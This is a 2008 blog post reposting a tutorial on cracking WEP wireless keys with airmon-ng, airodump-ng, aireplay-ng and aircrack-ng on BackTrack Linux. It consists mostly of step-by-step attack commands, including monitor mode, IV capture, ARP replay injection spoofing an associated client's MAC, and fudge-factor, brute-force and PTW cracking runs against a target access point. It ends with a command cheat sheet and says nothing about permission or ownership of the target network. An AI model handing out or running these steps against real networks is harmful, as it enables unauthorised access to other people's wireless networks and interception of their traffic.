Saturday, April 19, 2008

Cracking WEP (using BackTrack Linux)

From http://www.smallnetbuilder.com/content/view/30114/98/1/6/

Step #1:

bash# iwconfig #to list the wifi interfaces

bash# airmon-ng #to check the adapter status

bash# airmon-ng stop eth1 #to stop the interface

bash# airmon-ng start eth1 #to start the wifi interface in monitor mode (airmon-ng prints the name of the interface it put into monitor mode; use that name in the following steps)

Step #2:

bash# airodump-ng --ivs --write capturefile eth1 #note the channel, BSSID and client (station) MAC address of the target AP for the following steps

Step #3:

bash# airodump-ng --ivs --channel [AP channel] --bssid [AP BSSID] --write capturefile eth1 #to start capturing IVs

Step #4:

bash# aireplay-ng --arpreplay -b [AP BSSID] -h [client MAC from airodump] eth1 #to generate ARP traffic (-h is the MAC of a client already associated with the AP, so the AP accepts the replayed frames)

Step #5:

bash# aircrack-ng -b [AP BSSID] [capture file(s) name] # to perform the crack


Aircrack uses a combination of statistics and brute force to crack WEP keys. This excerpt from the aircrack page explains:

The idea is to get into the ball park with statistics then use brute force to finish the job. Aircrack-ng uses brute force on likely keys to actually determine the secret WEP key.

This is where the fudge factor comes in. Basically the fudge factor tells aircrack-ng how broadly to brute force. It is like throwing a ball into a field, then telling somebody the ball is somewhere between 0 and 10 meters (0 and 30 feet) away, versus saying the ball is somewhere between 0 and 100 meters (0 and 300 feet) away. The 100 meter scenario will take a lot longer to search than the 10 meter one, but you are more likely to find the ball with the broader search. It is a trade-off between the length of time and the likelihood of finding the secret WEP key.

For example, if you tell aircrack-ng to use a fudge factor of 2, it takes the votes of the most possible byte and checks all other possibilities which are at least half as possible as this one on a brute force basis. The larger the fudge factor, the more possibilities aircrack-ng will try on a brute force basis. Keep in mind that as the fudge factor gets larger, the number of secret keys to try goes up tremendously and consequently the elapsed time also increases. Therefore, with more available data, the need to brute force, which is very CPU and time intensive, can be minimized.

The command with a fudge factor of 4 added was:

aircrack-ng -f 4 -b 00:06:25:B2:D4:19 capturefile*.ivs

The good news was that it got us past the "attack failed" message. The bad news was that it didn't find the key after about 10 minutes.

The second run used the approach of "if a little is good, more is better" and doubled the fudge factor to 8, even though the suggested 30 minutes of aircrack run time hadn't elapsed. That, too, ran for a while, but also failed to nail the key.

The third run combined the fudge factor of 8 with the -x2 option to brute force the last two keybytes instead of just the default of the last keybyte. The command was:

aircrack-ng -f 8 -x2 -b 00:06:25:B2:D4:19 capturefile*.ivs

and was actually the command line used to get the successful run shown in Figure 10.

All of the above tricks came from the aircrack-ng Usage Tips: General approach to cracking WEP keys section, which you definitely should visit if you find yourself unable to crack a key even with the suggested number of IVs.

We also tried the PTW attack, to see if it really was that much faster. Figure 12 shows that PTW really does perform as advertised!


Figure 12: aircrack 0.9.1 using the PTW attack

It took airodump-ng under a minute to capture the 38,721 IVs and aircrack-ng 0.9.1 under a minute more to find the key. Aircrack actually found the key almost instantly after startup once it had enough IVs. The 55 seconds shown in Figure 12 came from starting aircrack-ng after only around 5,000 IVs had been captured.



Command Summary

All commands are entered as a single line.

Switching into monitor mode with airmon-ng

airmon-ng stop [WLAN adapter]
airmon-ng start [WLAN adapter]

Wireless survey with airodump-ng

airodump-ng --ivs --write [capturefile prefix] [WLAN adapter]

Wireless survey with airodump-ng 0.9.1 for PTW

airodump-ng --write [capturefile prefix] [WLAN adapter]

IV capture with airodump-ng

airodump-ng --ivs --channel [AP channel] --bssid [AP BSSID] --write capturefile [WLAN adapter]

IV capture with airodump-ng 0.9.1 for PTW (no --ivs: PTW needs the full frames, so the capture is written as a .cap file)

airodump-ng --channel [AP channel] --bssid [AP BSSID] --write capturefile [WLAN adapter]

aireplay-ng with ARP replay

aireplay-ng --arpreplay -b [AP BSSID] -h [client MAC from airodump] [WLAN adapter]

WEP crack with aircrack-ng

aircrack-ng -b [AP BSSID] [capture file(s) name]*.ivs

WEP crack with aircrack-ng and fudge factor 4

aircrack-ng -f 4 -b [AP BSSID] [capture file(s) name]*.ivs

WEP crack with aircrack-ng, fudge factor 8, brute force last two keybytes

aircrack-ng -f 8 -x2 -b [AP BSSID] [capture file(s) name]*.ivs

WEP crack with aircrack-ng 0.9.1 and PTW method

aircrack-ng -z -b [AP BSSID] [capture file(s) name]*.cap

